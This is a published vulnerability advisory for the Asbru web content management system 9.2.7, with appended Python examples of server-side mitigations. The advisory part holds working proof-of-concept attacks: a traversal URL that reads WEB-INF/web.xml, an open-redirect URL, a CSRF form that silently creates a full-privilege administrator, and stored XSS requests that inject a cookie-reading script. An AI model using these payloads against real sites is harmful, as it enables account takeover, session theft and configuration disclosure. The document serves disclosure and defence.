Asbru Web Content Management System 9.2.7 CSRF / XSS / Traversal
Posted on 06 April 2016
Asbru Web Content Management System v9.2.7 Multiple Vulnerabilities

Vendor: Asbru Ltd.
Product web page: http://www.asbrusoft.com
Affected version: 9.2.7

Summary: Ready to use, full-featured, database-driven web content management
system (CMS) with integrated community, databases, e-commerce and statistics
modules for creating, publishing and managing rich and user-friendly Internet,
Extranet and Intranet websites.

Desc: Asbru WCM suffers from multiple vulnerabilities including Cross-Site
Request Forgery, Stored Cross-Site Scripting, Open Redirect and Information
Disclosure.

Tested on: Apache Tomcat/5.5.23
           Apache/2.2.3 (CentOS)

Vulnerabilities discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience

Advisory ID: ZSL-2016-5314
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5314.php

09.03.2016

--

#1 Directory Traversal:
--------------------

http://10.0.0.7/../../../../../WEB-INF/web.xml

#2 Open Redirect:
--------------

http://10.0.0.7/login_post.jsp?url=http://www.zeroscience.mk

#3 Cross-Site Request Forgery (Add 'administrator' With Full Privileges):
----------------------------------------------------------------------

<html>
  <body>
    <form action="http://10.0.0.7/webadmin/users/create_post.jsp?id=&redirect=" method="POST">
      <input type="hidden" name="userinfo" value=" <TEST></TEST> " />
      <input type="hidden" name="title" value="Mr" />
      <input type="hidden" name="name" value="Chekmidash" />
      <input type="hidden" name="organisation" value="ZSL" />
      <input type="hidden" name="email" value="test@testingus.io" />
      <input type="hidden" name="gender" value="1" />
      <input type="hidden" name="birthdate" value="1984-01-01" />
      <input type="hidden" name="birthday" value="01" />
      <input type="hidden" name="birthmonth" value="01" />
      <input type="hidden" name="birthyear" value="1984" />
      <input type="hidden" name="notes" value="CSRFNote" />
      <input type="hidden" name="userinfo1" value="" />
      <input type="hidden" name="userinfoname" value="" />
      <input type="hidden" name="username" value="hackedusername" />
      <input type="hidden" name="password" value="password123" />
      <input type="hidden" name="userclass" value="administrator" />
      <input type="hidden" name="usergroup" value="" />
      <input type="hidden" name="usertype" value="" />
      <input type="hidden" name="usergroups" value="Account Managers" />
      <input type="hidden" name="usergroups" value="Company Bloggers" />
      <input type="hidden" name="usergroups" value="Customer" />
      <input type="hidden" name="usergroups" value="Event Managers" />
      <input type="hidden" name="usergroups" value="Financial Officers" />
      <input type="hidden" name="usergroups" value="Forum Moderator" />
      <input type="hidden" name="usergroups" value="Human Resources" />
      <input type="hidden" name="usergroups" value="Intranet Managers" />
      <input type="hidden" name="usergroups" value="Intranet Users" />
      <input type="hidden" name="usergroups" value="Newsletter" />
      <input type="hidden" name="usergroups" value="Press Officers" />
      <input type="hidden" name="usergroups" value="Product Managers" />
      <input type="hidden" name="usergroups" value="Registered Users" />
      <input type="hidden" name="usergroups" value="Shop Managers" />
      <input type="hidden" name="usergroups" value="Subscribers" />
      <input type="hidden" name="usergroups" value="Support Ticket Administrators" />
      <input type="hidden" name="usergroups" value="Support Ticket Users" />
      <input type="hidden" name="usergroups" value="User Managers" />
      <input type="hidden" name="usergroups" value="Website Administrators" />
      <input type="hidden" name="usergroups" value="Website Developers" />
      <input type="hidden" name="users_group" value="" />
      <input type="hidden" name="users_type" value="" />
      <input type="hidden" name="creators_group" value="" />
      <input type="hidden" name="creators_type" value="" />
      <input type="hidden" name="editors_group" value="" />
      <input type="hidden" name="editors_type" value="" />
      <input type="hidden" name="publishers_group" value="" />
      <input type="hidden" name="publishers_type" value="" />
      <input type="hidden" name="administrators_group" value="" />
      <input type="hidden" name="administrators_type" value="" />
      <input type="hidden" name="scheduled_publish" value="2016-03-13 00:00" />
      <input type="hidden" name="scheduled_publish_email" value="" />
      <input type="hidden" name="scheduled_notify" value="" />
      <input type="hidden" name="scheduled_notify_email" value="" />
      <input type="hidden" name="scheduled_unpublish" value="" />
      <input type="hidden" name="scheduled_unpublish_email" value="" />
      <input type="hidden" name="invoice_name" value="Icebreaker" />
      <input type="hidden" name="invoice_organisation" value="Zero Science Lab" />
      <input type="hidden" name="invoice_address" value="nu" />
      <input type="hidden" name="invoice_postalcode" value="1300" />
      <input type="hidden" name="invoice_city" value="Neverland" />
      <input type="hidden" name="invoice_state" value="ND" />
      <input type="hidden" name="invoice_country" value="ND" />
      <input type="hidden" name="invoice_phone" value="111-222-3333" />
      <input type="hidden" name="invoice_fax" value="" />
      <input type="hidden" name="invoice_email" value="lab@zeroscience.tld" />
      <input type="hidden" name="invoice_website" value="www.zeroscience.mk" />
      <input type="hidden" name="delivery_name" value="" />
      <input type="hidden" name="delivery_organisation" value="" />
      <input type="hidden" name="delivery_address" value="" />
      <input type="hidden" name="delivery_postalcode" value="" />
      <input type="hidden" name="delivery_city" value="" />
      <input type="hidden" name="delivery_state" value="" />
      <input type="hidden" name="delivery_country" value="" />
      <input type="hidden" name="delivery_phone" value="" />
      <input type="hidden" name="delivery_fax" value="" />
      <input type="hidden" name="delivery_email" value="" />
      <input type="hidden" name="delivery_website" value="" />
      <input type="hidden" name="card_type" value="VISA" />
      <input type="hidden" name="card_number" value="4444333322221111" />
      <input type="hidden" name="card_issuedmonth" value="01" />
      <input type="hidden" name="card_issuedyear" value="2016" />
      <input type="hidden" name="card_expirymonth" value="01" />
      <input type="hidden" name="card_expiryyear" value="2100" />
      <input type="hidden" name="card_name" value="Hacker Hackerowsky" />
      <input type="hidden" name="card_cvc" value="133" />
      <input type="hidden" name="card_issue" value="" />
      <input type="hidden" name="card_postalcode" value="1300" />
      <input type="hidden" name="content_editor" value="" />
      <input type="hidden" name="hardcore_upload" value="" />
      <input type="hidden" name="hardcore_format" value="" />
      <input type="hidden" name="hardcore_width" value="" />
      <input type="hidden" name="hardcore_height" value="" />
      <input type="hidden" name="hardcore_onenter" value="" />
      <input type="hidden" name="hardcore_onctrlenter" value="" />
      <input type="hidden" name="hardcore_onshiftenter" value="" />
      <input type="hidden" name="hardcore_onaltenter" value="" />
      <input type="hidden" name="hardcore_toolbar1" value="" />
      <input type="hidden" name="hardcore_toolbar2" value="" />
      <input type="hidden" name="hardcore_toolbar3" value="" />
      <input type="hidden" name="hardcore_toolbar4" value="" />
      <input type="hidden" name="hardcore_toolbar5" value="" />
      <input type="hidden" name="hardcore_formatblock" value="" />
      <input type="hidden" name="hardcore_fontname" value="" />
      <input type="hidden" name="hardcore_fontsize" value="" />
      <input type="hidden" name="hardcore_customscript" value="" />
      <input type="hidden" name="startpage" value="" />
      <input type="hidden" name="workspace_sections" value="" />
      <input type="hidden" name="index_workspace" value="" />
      <input type="hidden" name="index_content" value="" />
      <input type="hidden" name="index_library" value="" />
      <input type="hidden" name="index_product" value="" />
      <input type="hidden" name="index_stock" value="" />
      <input type="hidden" name="index_order" value="" />
      <input type="hidden" name="index_segments" value="" />
      <input type="hidden" name="index_usertests" value="" />
      <input type="hidden" name="index_heatmaps" value="" />
      <input type="hidden" name="index_user" value="" />
      <input type="hidden" name="index_websites" value="" />
      <input type="hidden" name="menu_selection" value="" />
      <input type="hidden" name="statistics_reports" value="" />
      <input type="hidden" name="sales_reports" value="" />
      <input type="submit" value="Initiate" />
    </form>
  </body>
</html>

#4 Stored Cross-Site Scripting:
----------------------------

a)

POST /webadmin/content/create_post.jsp?id=&redirect= HTTP/1.1
Host: 10.0.0.7

------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="webeditor_stylesheet"

/stylesheet.jsp?id=1,1&device=&useragent=&
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="restore"

------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="archive"

------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="publish"

Save & Publish
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="scheduled_publish"

2016-03-09 13:29
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="scheduled_unpublish"

------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="checkedout"

------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="revision"

------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="title"

"><script>alert(document.cookie)</script>
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="searchable"

------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="menuitem"

------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="file"; filename="test.svg"
Content-Type: image/svg+xml

testsvgxxefailed
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="file_data"

------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="server_filename"

------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="contentdelivery"

------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="image1"

------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="image2"

------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="image3"

------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="metainfo"

------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="segmentation"

------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="author"

------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="description"

------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="keywords"

------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="metainfoname"

------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="segmentationname"

------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="segmentationvalue"

------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="contentpackage"

------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="contentclass"

image
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="contentgroup"

------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="contenttype"

Photos
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="version_master"

0
------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="version"

------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="device"

------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="usersegment"

------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="usertest"

------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="users_group"

------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="users_type"

------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="users_users"

------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="creators_group"

------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="creators_type"

------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="creators_users"

------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="editors_group"

------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="editors_type"

------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="editors_users"

------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="publishers_group"

------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="publishers_type"

------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="publishers_users"

------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="developers_group"

------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="developers_type"

------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="developers_users"

------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="administrators_group"

------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="administrators_type"

------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="administrators_users"

------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="page_top"

------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="page_up"

------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="page_previous"

------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="page_next"

------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="page_first"

------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="page_last"

------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="related"

------WebKitFormBoundarygqlN2AtccVFqx0YN
Content-Disposition: form-data; name="selectrelated"

------WebKitFormBoundarygqlN2AtccVFqx0YN--

b)

POST /webadmin/fileformats/create_post.jsp HTTP/1.1
Host: 10.0.0.7

filenameextension="><script>alert(document.cookie)</script>
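The two request-parameter issues above (#1, a `../` sequence that reaches `WEB-INF/web.xml`, and #2, a `url` parameter that accepts an arbitrary absolute URL) share one root cause: a value taken from the request is used as a location without being checked against what the application is actually willing to serve or redirect to. The following is an added example of the server-side checks a defender would put in front of such parameters; it is not code from the advisory or from the Asbru product. The host allowlist, the document root `/var/www/site`, and the helper names `is_safe_redirect` and `resolve_static_path` are assumptions for the illustration.

```python
"""Defensive validation for redirect targets and static-file paths (added example)."""
from pathlib import PurePosixPath
from urllib.parse import unquote, urlsplit

# Constructed: the only hosts a post-login redirect may point at.
ALLOWED_REDIRECT_HOSTS = {"cms.example.internal"}

# Constructed: document root the static handler serves from, and the
# container directories under it that must never be served. WEB-INF is the
# servlet directory that the advisory's traversal request reads from.
WEB_ROOT = PurePosixPath("/var/www/site")
FORBIDDEN_TOP_LEVEL = ("WEB-INF", "META-INF")


def is_safe_redirect(target, allowed_hosts=ALLOWED_REDIRECT_HOSTS):
    """Allow a site-relative path or an absolute URL on an allowlisted host.

    Anything else (foreign host, protocol-relative //host, javascript: or
    data: scheme, backslash tricks that browsers normalise to slashes) is
    rejected, and the caller should fall back to a fixed landing page.
    """
    if not target:
        return False
    parts = urlsplit(target)
    if parts.scheme and parts.scheme not in ("http", "https"):
        return False
    if not parts.netloc:
        # Relative target: exactly one leading slash, no backslashes, so it
        # cannot be reinterpreted as "//other-host/..." by the browser.
        return target.startswith("/") and not target.startswith("//") and "\\" not in target
    # Absolute target: compare the parsed hostname, not a string prefix, so
    # "http://cms.example.internal@attacker/" and similar are not accepted.
    return parts.hostname in allowed_hosts


def resolve_static_path(requested, web_root=WEB_ROOT):
    """Map a request path to a file under web_root; return None if it escapes.

    Rather than normalising ".." away, any ".." component is rejected outright,
    as is anything that is still percent-encoded after one decode (a second
    decode somewhere downstream is a classic way a traversal filter is bypassed).
    """
    decoded = unquote(requested)
    if unquote(decoded) != decoded:
        return None  # double-encoded input
    if "\x00" in decoded or "\\" in decoded:
        return None
    candidate = PurePosixPath(decoded.lstrip("/"))
    if any(part == ".." for part in candidate.parts):
        return None
    if candidate.parts and candidate.parts[0].upper() in FORBIDDEN_TOP_LEVEL:
        return None
    return web_root / candidate


if __name__ == "__main__":
    # Constructed sample inputs, including the two request shapes from the advisory.
    for t in ["/webadmin/", "http://www.zeroscience.mk", "//evil.example/", "javascript:alert(1)"]:
        print(f"redirect {t!r:40} -> {'allow' if is_safe_redirect(t) else 'reject'}")
    for p in ["/css/site.css", "/../../../../../WEB-INF/web.xml", "/%2e%2e/WEB-INF/web.xml"]:
        print(f"path     {p!r:40} -> {resolve_static_path(p)}")
```

For the redirect case the safe fallback on rejection is a fixed in-application URL, never the original parameter with characters stripped; for the path case the check belongs in the static handler itself, because a check in a front proxy can be bypassed by an alternate encoding the proxy and the container decode differently.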
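Issues #3 and #4 are both failures of the `create_post.jsp` handlers to distrust what arrives in the form body: the user-creation POST carries no anti-forgery token, so a page on another origin can submit it with the victim's session cookie, and the `title` and `filenameextension` values are stored and later written into HTML unencoded. The following is an added example, not code from the advisory or the product, showing the two controls together in a minimal request handler: a per-session synchronizer token compared in constant time, an `Origin` header check as a second layer, and HTML encoding of the stored value at output. The `Session` class, the `handle_create_post` signature and the origin `https://cms.example.internal` are assumptions for the illustration.

```python
"""CSRF token verification and output encoding for a create handler (added example)."""
import hmac
import html
import secrets

EXPECTED_ORIGIN = "https://cms.example.internal"  # constructed site origin


class Session:
    """Constructed stand-in for a server-side session bound to the cookie."""

    def __init__(self):
        # One unpredictable token per session; the legitimate form embeds it
        # as a hidden field, and a forged form on another origin cannot read it.
        self.csrf_token = secrets.token_urlsafe(32)


def verify_csrf(session, submitted_token, origin_header, expected_origin=EXPECTED_ORIGIN):
    """Both checks must pass: the synchronizer token and the Origin header.

    compare_digest avoids a timing side channel on the token comparison.
    Origin is sent by browsers on cross-site POSTs and cannot be set by page
    script, so a mismatch (or its absence) is treated as a forgery.
    """
    if not submitted_token:
        return False
    if not hmac.compare_digest(session.csrf_token.encode(), submitted_token.encode()):
        return False
    return origin_header == expected_origin


def render_field(value):
    """Encode a stored user-supplied string for an HTML text or attribute context."""
    return html.escape(value, quote=True)


def handle_create_post(session, form, headers):
    """Return (status, body) the way the vulnerable create_post.jsp endpoints should."""
    if not verify_csrf(session, form.get("csrf_token"), headers.get("Origin")):
        return 403, "forbidden"
    # The value is stored as submitted; encoding happens where it is rendered,
    # so the same record is safe in every page that later displays it.
    stored_title = form.get("title", "")
    return 200, "<h1>" + render_field(stored_title) + "</h1>"


if __name__ == "__main__":
    s = Session()
    # Constructed requests: a forged cross-origin POST without the token, and a
    # legitimate one whose title carries the advisory's payload string.
    print(handle_create_post(s, {"title": "x"}, {"Origin": "https://attacker.example"}))
    print(handle_create_post(
        s,
        {"csrf_token": s.csrf_token, "title": '"><script>alert(document.cookie)</script>'},
        {"Origin": EXPECTED_ORIGIN},
    ))
```

The first call is refused with 403 before any write happens; the second is accepted but the rendered body contains `&lt;script&gt;`, so the stored value is displayed as text rather than executed. Encoding at output rather than stripping at input is the right choice here because the payload can be legitimate data in a title field, and because the same stored value may later be placed in a JSON or JavaScript context that needs a different encoder.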